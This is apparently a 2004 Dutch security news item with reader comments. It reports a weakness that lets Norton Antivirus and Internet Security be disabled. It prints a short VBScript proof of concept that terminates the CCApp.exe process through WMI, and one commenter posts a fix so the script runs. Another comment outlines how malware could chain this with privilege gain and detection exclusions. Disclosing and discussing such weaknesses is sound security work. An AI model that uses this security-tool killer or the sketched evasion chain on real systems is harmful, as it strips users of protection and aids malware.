image

Exploit in Norton Antivirus en Norton Internet Security

zondag 17 oktober 2004, 06:33 door Redactie, 16 reacties

Gebruikers van Norton Antivirus en Norton Internet Security zijn gewaarschuwd voor een exploit waardoor Script Blocking kan worden uitgeschakeld. Het probleem zou in alle versies van beide programma's aanwezig zijn. In een test met een volledig geupdate Norton Internet Security 2005 werd de applicatie compleet uitgeschakeld. Ook Antivirus en OutBreak (Internet Security onderdeel) werden uitgeschakeld!

PoC (Proof of Concept):

Open Notepad/Kladblok => voer onderste regels in => sla op als KILLNORTON.VBS
pgm = "CCApp.exe"
set wmi = getobject("winmgmts:")
sQuery = "select * from win32_process " _
& "where name='" & pgm & "'"
set processes = wmi.execquery(sQuery)
for each process in processes
process.terminate
next


Voer het VBS bestand uit en bekijk of jouw Norton ook vatbaar is. Symantec heeft nog geen patch voor dit probleem.

Met dank aan Imbiss.nl & Daniel Milisic voor het bekend maken van deze exploit

Reacties (16)
17-10-2004, 11:19 door Anoniem
Dit is niets meer dan een gescript versie van het handmatig killen van
ccapp.exe. Zeer foute boel dat je dit kan scripten, maar dat zijn we al langer
gewend.

Als je CCapp.exe vervangt door explorer.exe is je taakbalk ook ineens weg
(start overigens wel opnieuw op). Hetzelfde geld voor andere actieve apps
die je opgeeft.

Het vervelende is wel dat het OS eerder toegang heeft tot deze functie dan
Norton zelf, maar ik zou eerder de blame eerder bij MS neerleggen dan bij
Symantec.
17-10-2004, 14:17 door G-Force
Maar wat gebeurt er, indien Windows Scripting Host uitgeschakeld is,
en het bovenstaande VBS-bestand wordt uitgevoerd? Misschien dat
iemand hier licht kan werpen indien WSH uit staat? Ik kan me
overigens wel voorstellen dat deze exploit dan teniet wordt gedaan.

Daarom een oproep aan iedereen om dit eens uit te proberen.
17-10-2004, 20:16 door XaNcE
Norton Antivirus en Norton Internet Security blokkeren Windows Scripting
Host. Door gebruik te maken van Norton eigen Script Blocking kun je
Norton uitschakelen en Windows Scripting activeren!

Het gaat hier dus niet specifiek om Norton.
17-10-2004, 22:23 door Anoniem
Dit is niet nieuw hoor...
17-10-2004, 22:46 door XaNcE
Als dit niet nieuw was had Symantec het probleem ook wel opgelost!
EERST LEZEN DAN PAS COMMENTAAR GEVEN!
17-10-2004, 22:46 door G-Force
Door XaNcE
Norton Antivirus en Norton Internet Security blokkeren Windows
Scripting
Host. Door gebruik te maken van Norton eigen Script Blocking kun je
Norton uitschakelen en Windows Scripting activeren!

Het gaat hier dus niet specifiek om Norton.


Bedankt voor de info. Het probleem is al voorgelegd aan het Internet
Storm Centrum in de VS, die het verder gaat onderzoeken. Zij gaan
dit nu uitproberen op andere producten van Symantec.
17-10-2004, 23:29 door Anoniem
Ik heb weinig verstand van scripten. Maar als ik bovenstaand
scriptje zie, lijkt het mij dat je daarmee alles kunt
uitzetten. Want voor zover ik het kan beoordelen, worden er
geen exploits misbruikt.
Als de Norton-processen in hun eigen gebruikerscontext
(service-account of SYSTEM) draaien, dan kan een 'gewone'
gebruiker die processen toch nooit afknallen met zo'n
scriptje? Het besturingssysteem moet dat afschermen op basis
van rechten en netjes tegen die gebruiker zeggen 'access
denied'.
Of ben ik nou gek?!
18-10-2004, 11:05 door XaNcE
Rechten systeem staat buiten spel. Norton draaid namelijk als systeem
recht binnen Windows omgeving (anders functioneert Norton niet goed).
Het uitvoeren van zo'n script kan alle kanten opleiden. Uitschakelen van
Norton is bedoeld omdat Norton een eigen Script Blocker heeft. Is Norton
uitgeschakeld kan men doormiddel van een ander script meer rechten
krijgen of iets dergelijks.
18-10-2004, 15:10 door Anoniem
Door XaNcE
Rechten systeem staat buiten spel. Norton draaid namelijk als systeem
recht binnen Windows omgeving (anders functioneert Norton niet goed).
Het uitvoeren van zo'n script kan alle kanten opleiden. Uitschakelen van
Norton is bedoeld omdat Norton een eigen Script Blocker heeft. Is Norton
uitgeschakeld kan men doormiddel van een ander script meer rechten
krijgen of iets dergelijks.
Dus als een normale gebruiker onder Windows XP bovenstaand scriptje
draait, kan hij een proces afschieten dat onder het SYSTEM-account
draait? En als er geen Norton is, kan die gebruiker via een ander scriptje
zichzelf meer rechten toekennen? Ik vind dat vreemd.
18-10-2004, 17:29 door XaNcE
VB: VBS scriptje schakeld Norton uit => VBS of Virus proggie voert zichzelf
uit onder een draaiend programma met systeem rechten (msn of office
programma) en krijg zo rechten door zichzelf de systeemrechten
(IUSR_SYSTEM) toe te kennen of de op dat moment gelden rechten van
(CURRENT_USER) of het VBS scriptje/proggie copieert zichzelf in
Beheerders account (x:document and settingsAdministrator of All Users)
en word bij de eerste keer dat iemand zich aanmeld met beheer rechten
succesvol toegevoegd en vermenigvuldigd. Het VBS scriptje zou ook in
Norton een uitzondering kunnen toevoegen (cmd_line van norton) zodat hij
bij het opstarten van Norton niet opgemerkt wordt.

Het is maar een voorbeeld!
18-10-2004, 18:31 door Anoniem
En daarom is scripting zo gevaarlijk als dit soort acties allemaal wordt
toegestaan.
18-10-2004, 19:39 door Anoniem
Door XaNcE
VB: VBS scriptje schakeld Norton uit => VBS of Virus proggie
voert zichzelf uit onder een draaiend programma met systeem
rechten (msn of office programma) en krijg zo rechten door
zichzelf de systeemrechten (IUSR_SYSTEM) toe te kennen of de
op dat moment gelden rechten van (CURRENT_USER) of het VBS
scriptje/proggie copieert zichzelf in Beheerders account
(x:document and settingsAdministrator of All Users) en word
bij de eerste keer dat iemand zich aanmeld met beheer
rechten succesvol toegevoegd en vermenigvuldigd. Het VBS
scriptje zou ook in Norton een uitzondering kunnen toevoegen
(cmd_line van norton) zodat hij bij het opstarten van Norton
niet opgemerkt wordt. Het is maar een voorbeeld!
Ik ga het toch eens proberen zometeen, ik kan het haast niet
geloven namelijk. Als dit ècht zo werkt is toch de hele
beveiliging van Windows XP een grote aanfluiting? Wordt
vervolgd...
19-10-2004, 00:52 door Anoniem
Het is wel een bug, maar het een exploit noemen vind ik wel
erg ver gaan. Ok, de script blocker valt uit maar vbscripts
zijn in plain text en aangezien de memory scanner wel gewoon
werkt zal nog vóórdat het vbscriptje geopend wordt , de
virusscanner awaarschuwen voor vbs.generic@mm,
vbs.bloodhound.gen, vbs.loveletter.gen of vbs.melissa.gen .

En bovendien; als een gebruiker al zo ver is dat hij zonder
argwaan een vbs bestand opent, dan kun je de computer net zo
goed opgeven want binnen no-time zal er een executable
geopend worden, welke geen enkele restrictie heeft.
19-10-2004, 04:44 door Anoniem
Getest op XP SP2 met NAV 2003 Pro ;

Regel: 7
Teken: 9
Fout: Instructie wordt verwacht
Code: 800A0400
Bron: Compilatiefout Microsoft VBScript

Vertel mij het maar...
19-10-2004, 08:50 door Anoniem
Door Anoniem
Getest op XP SP2 met NAV 2003 Pro ;

Regel: 7
Teken: 9
Fout: Instructie wordt verwacht
Code: 800A0400
Bron: Compilatiefout Microsoft VBScript
Vertel mij het maar...
In regel sQuery = "select * from win32_process " _ de underscore aan het
eind weghalen en dan & "where name='" & pgm & "'" erachter plakken.
Dan doet-ie 't wel.
Ik heb 'm geprobeerd op Windows XP SP1 + alle updates behalve sp2.
Geen Norton draaien. Ik kon als gewone user geen processen afschieten
die onder het account System draaien. Bijvoorbeeld de processen van
Antivir. Er kwam geen foutmelding maar de processen bleven draaien.
Pffffffff, scheelt weer :)
23-10-2004, 15:03 door Anoniem
ik wil die fockking ding er uit...
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.